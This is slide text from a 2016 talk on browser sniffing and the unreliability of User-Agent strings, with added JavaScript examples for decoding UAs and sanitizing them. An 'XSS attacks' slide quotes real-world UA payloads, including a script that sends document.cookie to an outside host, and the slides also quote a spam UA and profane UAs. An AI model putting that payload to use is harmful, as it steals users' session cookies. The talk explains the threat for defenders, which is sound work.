everybody lies NLHTML5 @ Nerds & Company, March 17th 2016

yes, this talk is about browser sniffing

why a talk about browser sniffing?

browser sniffing is dirty

you should use feature detection

why a talk about browser sniffing?

what is browser sniffing?

The HTTP specification defines the User-Agent header. It contains a string with information about the browser.

Every request the browser makes to the server includes the User-Agent header.

GET http://whichbrowser.net/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: whichbrowser.net

HTTP/1.1 200 OK
Date: Mon, 08 Feb 2016 10:40:28 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT
ETag: "984-50cae11796432"
Accept-Ranges: bytes
Content-Length: 2436
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

You can access the exact same string using JavaScript:

<script type="text/javascript">
<!--
alert(navigator.userAgent);
//-->
</script>

You can use the User-Agent string to identify:
- the browser
- the rendering engine
- the operating system
- the device model
- and more

why browser sniffing is hard

things started out simple

Mosaic
Mosaic/1.0 (Win3.1)
Mosaic: the name of the browser. 1.0: the version of the browser. Win3.1: operating system.

Netscape Navigator
Mozilla/1.0 (Win3.1)
Mozilla: the code name of the browser. 1.0: the version of the browser. Win3.1: operating system.

but it quickly started to get complicated

Internet Explorer
Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)
MSIE: the name of the browser. Mozilla/1.0 (compatible; ...): compatible with Netscape Navigator 1.0. 1.0 (after MSIE): the version of the browser. Windows 95: operating system.

Opera
Opera/8.54 (Windows 95; U; en)
Opera: the name of the browser. 8.54: the version of the browser. Windows 95: operating system. en: English language. U: United States level encryption.

Opera
Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0
Opera: the name of the browser. 10.00: the version of the browser. Presto/2.2.0: rendering engine.

Opera
Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10
Opera: the name of the browser. 9.8: fake version of the browser. Version/10.10: real version of the browser.

Firefox
Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.12) Gecko/20090706 Firefox/3.0.12
Gecko: the name of the rendering engine. Firefox: the name of the browser. 20090706: build date of the rendering engine. 3.0.12: version of the browser. rv:1.9.0.12: version of the rendering engine.

Firefox
Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0
Gecko/20100101: the build date is no longer updated.

Firefox
Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0

and it gets worse…

Safari
Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3
Safari: the name of the browser. Version/3.2.3: version of the browser.

Chrome
Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3
Chrome: the name of the browser. 15.0.874.120: version of the browser.

Opera
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180
OPR: the name of the browser. 31.0.1889.180: version of the browser.

Internet Explorer
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
rv:11.0: version of the browser.

Edge
Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162
Edge: the name of the browser. 12.10162: version of the browser.

and those were all relatively normal User-Agent strings

“User-Agent strings only get larger over time, never smaller” Niels’s second law of User-Agent strings

Samsung Internet
Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
SAMSUNG GT-I9505: Samsung device. Version/1.5: version of the browser.

Nokia Xpress for Windows Phone
Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5

LG Netcast
Mozilla/5.0 (X11; Linux; ko-KR) AppleWebKit/534.26+ (KHTML, like Gecko) Version/5.0 Safari/534.26+

Sometimes browsers include a compatibility mode or desktop mode, which deliberately changes the User-Agent string.

Opera
Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
Opera: the name of the browser. Linux: the name of the operating system. Version/11.50: version of the browser.

Opera Mobile (desktop mode)
Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50
Opera: the name of the browser. zbov: "mobi", ROT13 encrypted. Version/11.50: version of the browser.

Internet Explorer
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
MSIE 8.0: browser version.

Internet Explorer (compatibility view)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Trident/5.0: Trident 5 means it's Internet Explorer 9.
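As an added example (not code from the talk or from WhichBrowser), a small JavaScript function that recovers the real version from the three cases above: Opera's Version/ token, Internet Explorer's compatibility view via the Trident token, and Opera Mobile's ROT13-hidden "mobi". Only Trident/5.0 = IE9 is stated on the slides; the other rows of the Trident table are well-known values and are not from the page.

```javascript
// Added example, not code from the talk: decode the "lying" User-Agent
// strings shown above. The facts taken from the slides are Opera's
// Version/ token, Trident/5.0 = IE9 and rot13("zbov") = "mobi".

// ROT13 is its own inverse, so the same function hides and reveals.
function rot13(s) {
  return s.replace(/[a-z]/gi, (c) => {
    const base = c <= "Z" ? 65 : 97;
    return String.fromCharCode(((c.charCodeAt(0) - base + 13) % 26) + base);
  });
}

// Trident (the IE engine) version -> Internet Explorer version. Only the
// Trident/5.0 -> 9 row is on the slides; the rest are well-known values.
const TRIDENT_TO_IE = { "4.0": "8.0", "5.0": "9.0", "6.0": "10.0", "7.0": "11.0" };

function analyze(ua) {
  const r = { browser: null, claimed: null, version: null, mobile: false, notes: [] };
  const platform = /\(([^)]*)\)/.exec(ua);

  // Opera before version 15: "Opera/9.80 ... Version/11.50". The number
  // after Opera/ is frozen; the Version/ token carries the real release.
  let m = /^Opera\/(\d+(?:\.\d+)?)(?:.*\bVersion\/(\d+(?:\.\d+)?))?/.exec(ua);
  if (m) {
    r.browser = "Opera";
    r.claimed = m[1];
    r.version = m[2] || m[1];
    if (m[2]) r.notes.push("Version/ token overrides Opera/ token");
    // Opera Mobile in desktop mode keeps "mobi" in the OS token, ROT13'd.
    if (platform && rot13(platform[1]).includes("mobi")) {
      r.mobile = true;
      r.notes.push('platform token contains rot13("mobi")');
    }
    return r;
  }

  // Internet Explorer: compatibility view rewrites "MSIE 8.0" but leaves
  // Trident/5.0 alone, so the engine token is the one to believe.
  m = /MSIE (\d+\.\d+).*Trident\/(\d+\.\d+)/.exec(ua);
  if (m) {
    r.browser = "Internet Explorer";
    r.claimed = m[1];
    r.version = TRIDENT_TO_IE[m[2]] || m[1];
    if (r.version !== r.claimed) r.notes.push("compatibility view");
    return r;
  }
  return r;
}
```

The function covers only the cases from these slides; for anything else it returns browser: null, which is the talk's own point about not rolling your own sniffing library.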

And it is possible to change the User-Agent string yourself.

spam
http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)

XSS attacks

<script>alert("My Little Pony");</script>
<script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script>
<img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony">


funny people
Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)
Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko) ( °□°

angry people

FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0
Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62
Seriously, Go fuck yourself
W3C standards are important. Stop fucking obsessing over user-agent already.

In 1,000,000 unique User-Agent strings:
108 x sex
82 x fuck
10 x shit
9 x dick
6 x ass
4 x balls
3 x vagina

User-Agent strings cannot be trusted!
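The same point from the defender's side, as an added example that is not from the talk: the User-Agent header is attacker-controlled input, so a log pipeline or analytics page should strip control characters, escape the value before rendering it and flag values that look like markup rather than a browser. The sample strings are constructed; the payload one mirrors the slide's <script> pattern without its URLs.

```javascript
// Added example, not from the talk: handle the User-Agent header as
// untrusted input on its way into logs and an analytics page.
const MAX_UA_LENGTH = 512;
const CONTROL_CHAR = /[\x00-\x1f\x7f]/;

// Patterns that do not belong in a browser identification. A plain URL is
// deliberately not listed: legitimate crawlers put one in their UA.
const MARKUP_PATTERNS = [/<\s*\/?\s*(script|img|iframe|svg)\b/i, /javascript:/i, /document\.cookie/i, /\bon\w+\s*=/i];

// Replace CR/LF and other control characters (a client could otherwise
// forge extra log lines) and cap the length before the value hits a log.
function sanitizeForLog(raw) {
  const s = String(raw || "").replace(/[\x00-\x1f\x7f]/g, " ");
  return s.length > MAX_UA_LENGTH ? s.slice(0, MAX_UA_LENGTH) + "[truncated]" : s;
}

// Escape before the stored value is rendered into HTML (analytics, error
// dashboards): the slide's <script> payload fires exactly there.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Classify so analytics can keep junk out of the browser statistics and
// route it to a review queue instead.
function processUserAgent(raw) {
  const hadControlChars = CONTROL_CHAR.test(String(raw || ""));
  const logValue = sanitizeForLog(raw);
  const looksLikeMarkup = MARKUP_PATTERNS.some((re) => re.test(logValue));
  return {
    logValue,
    html: escapeHtml(logValue),
    verdict: hadControlChars || looksLikeMarkup ? "suspicious" : "plausible",
  };
}

// Constructed samples for this example (the second mirrors the slide's
// payload without its URLs; the third tries to forge a second log line).
const SAMPLES = [
  "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)",
  '<script>alert("My Little Pony");</script>',
  'Mozilla/5.0 (X11; Linux)\r\n127.0.0.1 - - "GET /admin HTTP/1.1" 200',
];

for (const ua of SAMPLES) {
  const { verdict, logValue } = processUserAgent(ua);
  console.log(`${verdict.padEnd(10)} ${logValue}`);
}
```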

Everybody lies

you should never use browser sniffing for controlling access to your website

you should never use browser sniffing for determining browser capabilities

you should never build your own browser sniffing library

what is browser sniffing good for?

improve UX: if you know the platform or browser, you can streamline the user experience

analytics: if you know your users, you can build a better site for them

error logging: if you know which browser is causing problems, you can fix them

Use a browser sniffing library that is regularly updated. And check if it is possible to automatically schedule updates.

Try libraries like UAParser, Piwik DeviceDetector or WhichBrowser:
https://github.com/ua-parser
https://github.com/piwik/device-detector
https://github.com/whichbrowser

Please don't use WURFL, because it is outdated and just not good.

“If you tell a big enough lie and tell it frequently enough, it will be believed” — Gandhi


“If you tell a big enough lie and tell it frequently enough, it will be believed” — Adolf Hitler

Thank you!
